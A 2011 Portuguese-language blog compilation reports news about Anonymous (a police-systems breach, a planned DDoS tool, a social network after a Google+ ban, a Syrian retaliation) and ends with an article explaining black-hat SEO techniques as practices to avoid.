Nos vídeos que circulam no YouTube acusa-se a rede social de vender informação a agências governamentais e de oferecer clandestinamente dados dos utilizadores a empresas de segurança, "o que permite espiar pessoas de todo o mundo".

Também se avisa que "tudo o que se passa no Facebook fica no Facebook", sendo impossível impedir a recuperação da informação por parte da empresa sempre que esta o deseje, mesmo com a conta encerrada. "O Facebook sabe mais sobre ti do que a tua própria família", remata-se.

No YouTube pode ser encontrado mais do que um vídeo sobre o assunto. O mais antigo data de há três semanas atrás, e os mais recentes de há apenas dias. O slogan "Somos Anonymous. Somos legião. Não perdoamos. Não esquecemos. Aguardem-nos", serve de assinatura.



Num outro registo, e desta vez "confirmado oficialmente", os Anonymous informaram em comunicado ter acedido à rede informática de cerca de 70 sistemas policiais norte-americanos.

O grupo terá conseguido recolher dez gigas de dados que incluem emails, números de cartões de crédito e outras informações pessoais de agentes policiais locais, avança a AP.

"Vamos publicar uma quantidade maciça de informação confidencial que seguramente humilhará, desacreditará e incriminará agentes de polícia um pouco por todo o lado nos EUA", diz o comunicado. "Queremos expor a cultura corrupta inerente às forças policiais", acrescenta-se.

Novas ferramentas de hacking por Anonymous (um canhão Novo)

Novas ferramentas de hacking por Anonymous (um canhão Novo)

Anônima está desenvolvendo uma ferramenta nova DDoS. Até agora, o que eles têm é algo que é plataforma neutra, alavancando JavaScript e vulnerabilidades dentro de SQL para criar um impacto devastador sobre o site alvo. Mas será a última ferramenta, e vai fazer trabalho de aplicação da lei é mais difícil no longo prazo?
Anteriormente, Low Orbit Ion Canon (LOIC) foi a arma para ir para torcedores anônimos durante os protestos contra os ditadores na África do Norte, e Operation: Payback. No entanto, LOIC é também a razão dezenas de pessoas foram presas no último ano, assim que muitos sentem o seu tempo está no fim.
A nova ferramenta, chamada # RefRef, está previsto para ser lançado em setembro, de acordo com um Anon promovê-la no IRC, esta tarde. Desenvolvido com JavaScript, a ferramenta é dito para usar o poder do site de destino de processamento própria contra si mesma.


No final, o servidor sucumbe à exaustão de recursos devido ao uso de # RefRef. Um vetor de ataque que já existe há algum tempo, o esgotamento de recursos é muitas vezes ignorado por invasores que mais favorecem a força bruta de um ataque DDoS provenientes de bots ou ferramentas como LOIC.

Após ser banido do Google+, Anonymous decide criar sua própria rede social

 Após ser banido do Google+, Anonymous decide criar sua própria rede social

 Para hackers, "isso é o que acontece quando você caminha de acordo com uma batida diferente do tambor"; retaliação à Google também está prevista.

O grupo hacker Anonymous afirmou a criação de uma rede social própria, que não será "desligada, censurada ou oprimida".
Pela deciaração publicada em blog do Tumblr, a decisão parece ter sido motivada pela decisão da Google de banir o grupo de sua nova rede Google+.
Segundo aviso da Google recebido pelo grupo e também publicado no Tumblr, alguns dos posts do "Your Anon News" "violava nossos padrões para a comunidade".
Em blog no Tumblr, o grupo reconhece ter sido banido do Google+ por causa do conteúdo postado, mas ressalta que não sabia da extensão desse banimento.
"Isso é o que acontece na Internet quando você caminha de acordo com uma batida diferente do tambor", afirma o grupo, no blog.
"Nós todos já ouvimos histórias de ativistas sendo banidos do Facebook, Twitter, YouTube, e de governos que bloqueiam seus cidadão nesses sites (...). Esses dias vão chegar a um fim. Não apenas um grupo organizado de pessoas decidiu por uma operação contra o Google+, como nós começamos a construir nossa própria rede social."
"O tempo das ovelhas acabou. As Interwebz não são mais sua prisão", declarou o grupo.

Fonte:http://idgnow.uol.com.br/seguranca/2011/07/18/apos-ser-banido-do-google-anonymous-decide-criar-sua-propria-rede-social/

Hackers sírios atacam rede social do Anonymous

 Retaliação ocorreu após grupo hacker sabotar site do Ministério da Defesa da Síria; rede social continua fora do ar.

Depois do grupo Anonynous assumir os ataques ao site do Ministério da Defesa da Síria, um grupo sírio retaliou a nova rede social dos Anonymous, removendo o site do ar e exibindo mensagens que contém imagens fortes de carnificina. Esse movimento, que aconteceu no AnonPlus, site inaugurado pelo Anonymous no mês passado, não foi revindicado.
A Monk School of Global Affairs da Universidade de Toronto, todavia, creditou os ataques a um grupo chamado Syrian Electronic Army, em uma post no Twitter. “Em resposta aos ataques ao site do Ministério da Defesa da Síria, o povo sírio decidiu purificar a internet do seu site patético”, escreveram os hackers.
O Syrian Electronic Army (Exército Eletrônico Sírio) foi ligado a outros ataques contra sites que postaram conteúdos criticando o regime da Síria, que tem sido condenado mundialmente pela repressão brutal aos protestos contra o governo. Hoje (8/8), de acordo com o jornal The New York Times, mais três países do Golfo (Arábia Saudita, Bahrein e Kuwait) removeram seus embaixadores de Damasco, em protesto à opressão feita pelo presidente Bashar al-Assad.
O ataque ao AnonPlus incluiu fotografias explícitas de corpos queimados e afirmações de que militares e civis sírios foram mortos pelos manifestantes. O grupo Anonymous ficou conhecido por derrubar, durante o fim do ano passado, sites da Mastercard, Visa e Pay-Pal, em ações em defesa ao Wikileaks.
Até às 19 horas (horário de Brasília), o endereço continuava offline, no entanto um screenshot mostrando o conteúdo do site alterado foi divulgado. “Ao povo sírio: o mundo se une a vocês contra o regime brutal de Basher al-Assad. Todos os tiranos irão cair, e graças a sua bravura, Basher al-Assad é o próximo” escreve o manifesto. O site do Ministério da Defesa da Síria é hospedado por um provedor em Damasco, de acordo com informações do serviço WHOIS. Outros endereços que pertencem ao governo também estão localizados nos mesmos servidores do provedor, incluindo o Ministério de Informações, que continua online.

Fonte:http://idgnow.uol.com.br/seguranca/2011/08/08/hackers-sirios-atacam-rede-social-do-anonymous/

sexta-feira, 5 de agosto de 2011

Black SEO.

Black SEO

Black SEO
As práticas de otimização são excelentes e não causam mal algum ao seu site. Elas podem demorar algum tempo para ter resultado, mas no fim compensam o esforço.
Porém, existem técnicas não éticas que podem agilizar o resultado, melhorar incrivelmente o posicionamento do seu site ou aparecer em primeiro em diversas buscas por palavras-chave. É por isto que você deve conhecer estas técnicas, para evitá-las e não prejudicar o seu próprio site o ou seu cliente. Estas técnicas são conhecidas como Black Hat SEO. Seria como o spam é para o e-mail marketing.
Por isto, estas técnicas também são conhecidas como Search Spam. Existem empresas do mercado SEO que utilizam estas técnicas e pela falta de experiência no assunto, muitos clientes acabam nem tendo idéias de que seus sites estão empregando Black Hat SEO. Utilizar estas práticas pode ser tentador a primeira vista, mas se forem descobertas pelos sites de busca, podem ser punidas com perda de posicionamento ou até a exclusão do site dos resultados das buscas.
O caso mais famoso de Black Hat SEO descoberto foi o da BMW Alemã. Quando um site de busca visitava o site, ela exibia um conteúdo diferente do que era exibido para um visitante. O caso foi descoberto e o Google excluiu o site da BMW dos resultados de sua busca.
Para depois dizer que não sabia, vamos ver algumas destas técnicas. Estas informação são apenas de caráter informativo e em hipótese nenhuma devem ser empregadas.

Keyword Stuffing

Vimos que quanto mais uma palavra-chave aparece em um texto, maior a probabilidade dela ser retornada em um resultado de busca. Então para aumentar a quantidade de vezes que a palavra-chave aparece é utilizada a técnica de Keyword Stuffing onde a palavra-chave é inserida repetidas vezes no conteúdo da página como em meta tags, título da página ou no corpo do texto.
Muitas vezes as páginas que utilizam esta técnicas não são possíveis de serem entendidas, pois apenas agrupam uma grande quantidades de palavras não relacionadas que acabam não fazendo sentido para que as lê. Existem até programas que criam conteúdo para as páginas com a repetição de palavras-chave necessárias para um bom posicionamento. Como já comentado, não faça.

Texto invisível

Para aumentar a quantidade de palavras-chave ou para colocar palavras-chave populares que não tem haver com o texto, é utilizada a técnica de texto invisível ou do inglês: invisible text.
A técnica consiste em inserir um texto na mesma cor que o fundo da página. Por exemplo, se a página tem fundo branco, a cor do texto também é branca. Assim, usuários que visitam a página não conseguem visualizar este texto, porém, como os bots de busca são máquinas, eles apenas coletam o texto independente da cor e indexam este conteúdo.

Cloaking e Doorway page

São técnicas com a mesma finalidade, exibir conteúdo diferente para sites de busca do conteúdo para navegadores. A principal diferença, é que o cloaking checa o IP ou navegador do visitante enquanto o Doorway usa redirecionamento por meta, javascript ou até o clique do usuário.

Link Farms

Esta técnica é mais complexa. Nela vários sites são criados com links apontando uns para os outros ou para apenas uma página criando artificialmente popularidade para os envolvidos. A troca de links também não é bem vista.

Over-Submitting

A tentação de ter sua página em todas as ferramentas de busca do mundo é grande e para isto existem programas que inserem em poucos segundos um pedido de inserção do seu site. Tenha cuidado com estes serviços, pois o envio excessivo de pedidos para sites pode ser considerado como spam. Prefira sempre o cadastramento manual.
Bom, estas são algumas das estratégias. De qualquer maneira, sempre vale consultar as guidelines de cada site de busca.
Na dúvida, use sempre o bom senso. Não tem erro.

Denunciar spam nos resultados

Se você souber de algum abuso praticado por um site com algumas destas técnicas, você pode reportar o incidente.
Fonte:http://www.marketingdebusca.com.br/black-hat-seo/